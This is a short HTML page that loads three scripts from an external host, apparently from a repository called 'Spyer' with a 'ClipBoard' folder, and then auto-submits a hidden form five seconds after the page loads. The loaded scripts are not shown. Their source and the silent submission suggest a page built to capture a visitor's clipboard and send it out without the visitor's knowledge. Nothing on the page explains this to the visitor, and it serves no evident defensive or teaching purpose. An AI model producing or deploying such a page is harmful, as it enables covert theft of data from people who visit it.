
<script src='https://raw.githack.com/yehia-hacker/Spyer/master/ClipBoard/javascript.js'></script>

<div id='index'>sssss</div>




<script src='https://raw.githack.com/yehia-hacker/Spyer/master/ClipBoard/runindex.js'></script>
<script id="rendered-js" src='https://raw.githack.com/yehia-hacker/Spyer/master/ClipBoard/data.js'></script>
    
    <script>
    window.onload = setTimeout(function(){
 document.getElementById("myForm").submit();
        
        
}, 5000);
    </script>
